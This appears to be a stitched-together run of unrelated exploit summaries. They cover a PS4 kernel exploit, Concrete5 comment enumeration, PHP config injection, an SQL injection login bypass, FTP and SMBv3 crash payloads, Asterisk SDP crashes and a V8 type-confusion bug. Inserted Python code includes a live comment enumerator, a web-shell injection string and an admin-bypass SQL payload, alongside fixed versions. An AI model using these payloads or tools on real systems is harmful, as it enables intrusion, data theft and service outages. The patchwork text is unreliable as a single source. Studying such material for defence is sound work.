This project contains a full implementation of the 'bpf' kernel exploit for the PlayStation 4 on firmware 4.55. It allows you to run arbitrary code with kernel privileges, enabling jailbreaking and kernel-level modifications to the system. This release, however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew. The exploit does include a loader that listens for payloads on port 9020 and executes them upon receipt.
This script attempts to enumerate all comments from a vulnerable Concrete5 CMS install. It does this by sending POST requests to the specified URL with a cnvID parameter that is incremented from the start ID to the end ID. Each response is parsed with BeautifulSoup, and the username and message are added to the results list.
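The enumeration loop described above, as an added example that is not the original script: the only detail taken from the description is the cnvID POST parameter. The HTML markup the parser looks for (elements with class "username" and "message"), the pluggable fetch() callback and the sample responses are assumptions constructed here so the code runs offline; the stdlib HTMLParser stands in for the BeautifulSoup step.

```python
"""Offline model of a cnvID enumeration loop (added example, assumed markup)."""
import urllib.parse
import urllib.request
from html.parser import HTMLParser


class CommentParser(HTMLParser):
    """Collects the text of the first elements carrying class 'username'
    and 'message'. This markup is an assumption, not Concrete5's real HTML."""

    def __init__(self):
        super().__init__()
        self.username = None
        self.message = None
        self._field = None

    def handle_starttag(self, tag, attrs):
        classes = dict(attrs).get("class", "").split()
        if "username" in classes:
            self._field = "username"
        elif "message" in classes:
            self._field = "message"

    def handle_data(self, data):
        if self._field and data.strip():
            setattr(self, self._field, data.strip())
            self._field = None

    def handle_endtag(self, tag):
        self._field = None


def parse_comment(html):
    """Return {'username', 'message'} or None when the response holds no comment."""
    parser = CommentParser()
    parser.feed(html)
    if parser.username is None or parser.message is None:
        return None
    return {"username": parser.username, "message": parser.message}


def http_fetch(url, cnv_id, timeout=10):
    """Live transport: POST cnvID=<id> to the target URL and return the body."""
    data = urllib.parse.urlencode({"cnvID": cnv_id}).encode()
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_comments(url, start_id, end_id, fetch=http_fetch):
    """Walk cnvID from start_id to end_id inclusive, keeping parsed comments."""
    results = []
    for cnv_id in range(start_id, end_id + 1):
        comment = parse_comment(fetch(url, cnv_id))
        if comment:
            comment["cnvID"] = cnv_id
            results.append(comment)
    return results


# Constructed sample responses standing in for a live server (not real data).
SAMPLE_RESPONSES = {
    1: '<div class="comment"><span class="username">alice</span>'
       '<p class="message">first post</p></div>',
    2: '<div class="comment"><span class="username">bob</span>'
       '<p class="message">reply to alice</p></div>',
    3: '<div class="error">No such conversation</div>',
}


def fake_fetch(url, cnv_id):
    return SAMPLE_RESPONSES.get(cnv_id, "")


def demo():
    """Run the loop against the constructed responses (hypothetical URL)."""
    return enumerate_comments("http://target.example/index.php", 1, 3, fetch=fake_fetch)


if __name__ == "__main__":
    for comment in demo():
        print(comment)
```

Swapping fake_fetch for http_fetch turns the model into a live enumerator; the parser's class names would then have to be adjusted to the real page markup.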
Arbitrary PHP code can be injected into the configuration file (config.php) that is written when installation completes. Injecting the code requires a fresh install and valid database credentials. The application forces the installing user (usually "www-data", since installation is web-based) to set write permission (777) on the destination directory and the related installation file. An attacker proceeds through the installation process until step 4 and injects malicious PHP code into the "timezone" parameter. Once the PHP code has been written to "config.php", the attacker can execute OS commands by requesting the backdoored "config.php" file with the injected parameter carrying the OS command.
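A Python model of the injection mechanism described above, added here and not taken from the affected application: the config line is generated by interpolating the "timezone" value into PHP source, a payload closes the string literal early, and an escaping rule that follows PHP's single-quoted string syntax keeps the same payload inside the literal. The template line, the payload and the escaping helper are assumptions; only the file name and parameter name come from the description.

```python
"""Model of unescaped vs. escaped interpolation into a PHP config file (added example)."""

# Assumed shape of the generated line; the real installer's template is not on the page.
VULNERABLE_TEMPLATE = "<?php\n$timezone = '{tz}';\n"


def render_config_vulnerable(timezone):
    """Interpolates the user-supplied value straight into PHP source."""
    return VULNERABLE_TEMPLATE.format(tz=timezone)


def php_single_quote(value):
    """Escape a value for a PHP single-quoted literal. Only backslash and the
    quote are special there, the same rule PHP's var_export() applies."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_config_fixed(timezone):
    """Same line, but the value can never terminate the literal."""
    return "<?php\n$timezone = " + php_single_quote(timezone) + ";\n"


def split_literal(php_src):
    """Tiny scanner: read the first PHP single-quoted literal in php_src and
    return (decoded_value, code_after_literal). Whatever follows the closing
    quote is executed as PHP, which is exactly what the attacker needs."""
    i = php_src.index("'") + 1
    out = []
    while i < len(php_src):
        ch = php_src[i]
        if ch == "\\" and i + 1 < len(php_src) and php_src[i + 1] in "\\'":
            out.append(php_src[i + 1])   # \\ and \' are the only escapes
            i += 2
            continue
        if ch == "'":
            return "".join(out), php_src[i + 1:]
        out.append(ch)
        i += 1
    raise ValueError("unterminated literal")


# Constructed payload: ends the literal, adds a backdoor reading the 'c'
# query parameter, and comments out the template's trailing quote.
PAYLOAD = "UTC'; system($_GET['c']); //"


def injected_code(render):
    """Render PAYLOAD with the given generator and report what PHP would
    see as the literal's value and as code following it."""
    value, rest = split_literal(render(PAYLOAD))
    return value, rest.strip()


if __name__ == "__main__":
    print("vulnerable:", injected_code(render_config_vulnerable))
    print("fixed:     ", injected_code(render_config_fixed))
```

With the vulnerable generator the literal ends at "UTC" and `system($_GET['c'])` becomes live code; with the escaped generator the whole payload is the literal's value and only the original `;` follows. Escaping is the minimum fix; an installer should additionally reject any timezone that is not in the server's known identifier list.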
An SQL injection vulnerability exists in PHP Scripts Mall School Management Script 3.0.4. An attacker can exploit it by entering an SQL injection payload in the Username or Password field of the parent_login.php page, which allows the attacker to log in as an admin user.
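The login bypass described above, modelled with sqlite3 as an added example; this is not the School Management Script's code. The users table, its column names, the sample rows and the payload are constructed here; parent_login.php and its Username/Password fields are the only details taken from the description. The vulnerable function builds the query by string formatting, the fixed one binds parameters.

```python
"""Authentication bypass via SQL injection, vulnerable vs. parameterised (added example)."""
import sqlite3


def make_db():
    """In-memory table with constructed rows (assumed schema, not the real one)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    # Plaintext passwords only to keep the sample small; a real app stores hashes.
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!", "admin"), ("parent1", "kidsRgreat", "parent")],
    )
    return conn


def vulnerable_login(username, password, conn=None):
    """Concatenates form fields into the WHERE clause; the input becomes SQL."""
    conn = conn or make_db()
    query = (
        f"SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return {"username": row[0], "role": row[1]} if row else None


def fixed_login(username, password, conn=None):
    """Same query with bound parameters; the input is data, never SQL."""
    conn = conn or make_db()
    row = conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return {"username": row[0], "role": row[1]} if row else None


# Constructed payload for the Username field: closes the literal, selects the
# admin row, and comments out the password check with SQL's `--`. The same
# string works in the Password field because OR binds looser than AND.
BYPASS_USERNAME = "' OR role = 'admin' -- "


if __name__ == "__main__":
    print("vulnerable:", vulnerable_login(BYPASS_USERNAME, "anything"))
    print("fixed:     ", fixed_login(BYPASS_USERNAME, "anything"))
```

The resulting statement in the vulnerable path reads `WHERE username = '' OR role = 'admin' -- ' AND password = 'anything'`, so the admin row is returned without a password; the parameterised path compares the payload string to the username column and finds nothing.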
netek 0.8.2 FTP is vulnerable to a denial-of-service attack. An attacker can send a crafted payload of 5000 'A' characters followed by 1000 'B' characters to the default port 30817 to crash the server, driving CPU usage to 100%.
This exploit triggers a Blue Screen of Death (BSoD) on the target machine by sending a specially crafted payload to the SMBv3 service. The payload triggers a null pointer dereference, which crashes the system.
A specially crafted SDP message body with an invalid fmtp attribute causes a segmentation fault in Asterisk when `chan_pjsip` is in use. Abusing this vulnerability results in a denial of service.
A specially crafted SDP message body with an invalid media format description causes a segmentation fault in Asterisk when `chan_pjsip` is in use.
A crash occurs when a number of INVITE messages are sent over TCP or TLS and the connection is then closed abruptly. The issue results in a segmentation fault.
The TranslatedState::MaterializeCapturedObjectAt function does not cache the object it creates (a store such as 'slot->value_ = object' is missing), so the same captured object can be materialized more than once, producing distinct objects that share the same properties; this leads to type confusion. The proof-of-concept code creates two such objects: they are not equal, yet changing a property on one object changes it on the other, demonstrating the type confusion.